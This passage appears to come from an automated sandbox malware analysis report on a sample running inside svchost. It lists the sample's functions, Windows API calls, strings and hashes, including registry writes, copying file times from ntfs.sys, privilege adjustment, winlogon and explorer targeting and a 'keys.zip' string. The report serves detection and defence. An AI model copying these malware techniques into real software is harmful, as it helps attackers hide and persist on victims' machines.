                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,74DEF380), ref: 02C97C63
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 4158279268-3673152959
                                                                                                                                                                                                              • Opcode ID: 58b8042cb11af38f987d055c3672050e6c0fb9798ce84f0840696e34c379d61a
                                                                                                                                                                                                              • Instruction ID: f78738830730d163efcd70bc4bef58ccf32518e3531b5433fe5d267d1a84bf61
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58b8042cb11af38f987d055c3672050e6c0fb9798ce84f0840696e34c379d61a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9941F7B1A1115DAFEF14DB74CC8CAEEBBBDEB88304F5045A8E645D3140E7709A498BA0
                                                                                                                                                                                                              Function 02CA48F0 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103registrystringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • strstr.MSVCRT ref: 02CA4902
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA491A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4941
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,-0000000B,00000104), ref: 02CA496F
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(-0A6461A1,software\microsoft,00000000,00000102,00000000), ref: 02CA49CE
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 02CA49FE
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000), ref: 02CA4A0C
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 02CA4A1A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminCloseFlushOpenUserValuelstrcpynmemsetstrstr
                                                                                                                                                                                                              • String ID: software\microsoft
                                                                                                                                                                                                              • API String ID: 1783443066-3673152959
                                                                                                                                                                                                              • Opcode ID: ee38e2e81deede7afbff7991a55436d34f78e8f20ba1790350ccbbbc97f9b2ca
                                                                                                                                                                                                              • Instruction ID: 76511c12056f74d458b45a1e64c69a7232ef8231b85dc91c066249e44cdb925e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee38e2e81deede7afbff7991a55436d34f78e8f20ba1790350ccbbbc97f9b2ca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 41313931A4020E9BEB26CB64DC59FE97BBCBF85749F044594EA45EB140D7F09B44CB90
                                                                                                                                                                                                              Function 004014B0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 93processstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                              • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                              • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 2248944234-2746444292
                                                                                                                                                                                                              • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                              Function 02C93910 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SymGetModuleBase.DBGHELP(00000000,?,?,00000004), ref: 02C93969
                                                                                                                                                                                                              • SymGetModuleInfo.DBGHELP(00000000,00000000,0000023C), ref: 02C9397C
                                                                                                                                                                                                              • SymGetSymFromAddr.DBGHELP(00000000,?,?,00000018), ref: 02C93993
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C939BD
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02C939E1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Module_snprintf$AddrBaseFromInfo
                                                                                                                                                                                                              • String ID: %s!%s + 0x%04x$%s!0x%08x$unknown!0x%08x
                                                                                                                                                                                                              • API String ID: 844136142-2194319270
                                                                                                                                                                                                              • Opcode ID: 6aa52867f84ecc6b748d5d82d3da6785d36d9147ab3a3a7295d8830c9dc91fbf
                                                                                                                                                                                                              • Instruction ID: c4b07396223532be22c21c5ad937a17e9351cffc7ca0949a9b4de27ab251b16d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6aa52867f84ecc6b748d5d82d3da6785d36d9147ab3a3a7295d8830c9dc91fbf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E210772641148AFEB118F48DC88FFE77ACEB84755F448195F909D7141E7709B58CBA0
                                                                                                                                                                                                              Function 02CB2800 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB2827
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02CB2867
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?), ref: 02CB2871
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB2879
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB288A
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,?,?), ref: 02CB2891
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 02CB289E
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: A23C4505$keys.zip
                                                                                                                                                                                                              • API String ID: 4256651433-2360589450
                                                                                                                                                                                                              • Opcode ID: 67c3b66ca71d53715e5cdf06bfa37a94c27152ff23985bc9a7aa00758103c9e8
                                                                                                                                                                                                              • Instruction ID: 354258aaf963efdca4a0032acf1f74bdd87d4ac9f4037520062644beef41c2a9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 67c3b66ca71d53715e5cdf06bfa37a94c27152ff23985bc9a7aa00758103c9e8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6214C759013194BCF129B349858BFB7BE8EF9A341F548A94ED85C7200DB71C654CB91
                                                                                                                                                                                                              Function 00401BE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76filetimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                              • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                              • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                              • API String ID: 1046229350-2760794270
                                                                                                                                                                                                              • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                              Function 004028D0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 34COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028D9
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                              • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                              • String ID: Pnv$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3001685711-2958163460
                                                                                                                                                                                                              • Opcode ID: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction ID: 2c3c2cb6c74497f887580688acf30243e480456bbc90e7420e586ff1c8abd763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83ac0b8a74455aed3f9fe13c08d3b3a7fcb0d139d0bb709980968f6615d0e93a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FF012B07542196AEA1067A1AE0AB5B3A5CDB84790F404177BF04F61D0DAB99C0185FD
                                                                                                                                                                                                              Function 02CB32C8 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CB32DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB32E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB32F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB3316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C4505,RFK), ref: 02CB3330
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB3336
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: A23C4505$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$RFK
                                                                                                                                                                                                              • API String ID: 4280258085-1619370212
                                                                                                                                                                                                              • Opcode ID: b3ad02537ee99b85e5e6db8b7b8bfc883bef99830c6448b5c44bd58fc3b862e0
                                                                                                                                                                                                              • Instruction ID: 569fca59b012b6d3834e1ae181606a9bb00800d1689d5b60658067a7683776a0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3ad02537ee99b85e5e6db8b7b8bfc883bef99830c6448b5c44bd58fc3b862e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEF0A770AC67916BF62267605C0AF9FB7986F84B49F404555F91AE3181CBB081058BA2
                                                                                                                                                                                                              Function 02CAB908 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02CAB91C
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAB925
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAB939
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAB94B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c41af), ref: 02CAB956
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c41af,ALPHA), ref: 02CAB970
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAB976
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$a23c41af
                                                                                                                                                                                                              • API String ID: 4280258085-2804296356
                                                                                                                                                                                                              • Opcode ID: 9b709d595d512e1f881a0462edcbc7a4ee49df0bcb403915e013c0fc37f59ea7
                                                                                                                                                                                                              • Instruction ID: a44e2a158446d200dfcf98c7e86fbae17f7f3b209d2fe21938f39be284d76422
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b709d595d512e1f881a0462edcbc7a4ee49df0bcb403915e013c0fc37f59ea7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10F0A7306CA3126BFA216B709C2AF5E77E8BF49B4DF004514FA07E1280C7B08504DBA2
                                                                                                                                                                                                              Function 02CAFE98 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 30sleepsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CAFEAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CAFEB5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CAFEC9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CAFEDB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4015), ref: 02CAFEE6
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c4015,HANDY), ref: 02CAFF00
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CAFF06
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                              • String ID: HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$a23c4015
                                                                                                                                                                                                              • API String ID: 4280258085-448726435
                                                                                                                                                                                                              • Opcode ID: 5031f71841c1424753549ea8364b9b331ff5ce47c4fbbe682963215610175cc3
                                                                                                                                                                                                              • Instruction ID: 8bfa363add3fdfc258c4caa7491538bb91eb120066930dc1151d37282a09bcf8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5031f71841c1424753549ea8364b9b331ff5ce47c4fbbe682963215610175cc3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2F0A7306C63567FF62167609C1AF5EB7D8AF46B4EF404518F94AE1181C7B881548BA2
                                                                                                                                                                                                              Function 02CB9160 Relevance: 15.4, APIs: 8, Strings: 2, Instructions: 394COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: /$UT
                                                                                                                                                                                                              • API String ID: 0-1626504983
                                                                                                                                                                                                              • Opcode ID: 1310f081c385e15e762725138708e7c54203468be13846b63065e18cc427dbaa
                                                                                                                                                                                                              • Instruction ID: ef9d35fae936333a3fa40fdf835bbae26c07528cfd7a7ca961b5ef24c170ae14
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1310f081c385e15e762725138708e7c54203468be13846b63065e18cc427dbaa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54F1A171E042588BCF26CF69C8807EABBB9EF85314F1485DAE908AB345D7719B84CF51
                                                                                                                                                                                                              Function 02C9FBF0 Relevance: 15.3, APIs: 7, Strings: 3, Instructions: 271COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$_snprintf
                                                                                                                                                                                                              • String ID: 0$%x$Content-Length
                                                                                                                                                                                                              • API String ID: 4125937431-3838797520
                                                                                                                                                                                                              • Opcode ID: c130347dcaa7512a3d7b6ca0909d16856c027da0609c0c184f70b0830ec3c2d4
                                                                                                                                                                                                              • Instruction ID: c77aac13f47dbea48ff41bda9f4cf4990aac8212e2450b9066e0415b540cfa7a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c130347dcaa7512a3d7b6ca0909d16856c027da0609c0c184f70b0830ec3c2d4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4A919576600746AFCB14DF68DC84A6AB7A9FF88314B048B2DF919C7A41D770E914CBE1
                                                                                                                                                                                                              Function 02C9B820 Relevance: 15.1, APIs: 10, Instructions: 81synchronizationwindowthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9B843
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9B870
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9B877
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9B889
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02C9B898
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C9B8A2
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C9B8B4
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9B8E1
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9B8E8
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000215,00000000,?), ref: 02C9B8FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2596333622-0
                                                                                                                                                                                                              • Opcode ID: abb74d68290be97a846f5aaa6d340571f723327e743e5a6a68bde09ba2260fd4
                                                                                                                                                                                                              • Instruction ID: a76af237950874dffe3c8cfee10d2870e3394c0da2ef12bfc1add822e52177d5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: abb74d68290be97a846f5aaa6d340571f723327e743e5a6a68bde09ba2260fd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7721F771A82114AFC7108F69F80CFAAB7E8EF89775B458B76F505DB290C3705421CBA4
                                                                                                                                                                                                              Function 02CB4278 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 121synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4297
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C,?,?), ref: 02CB4329
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02CB43B5
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
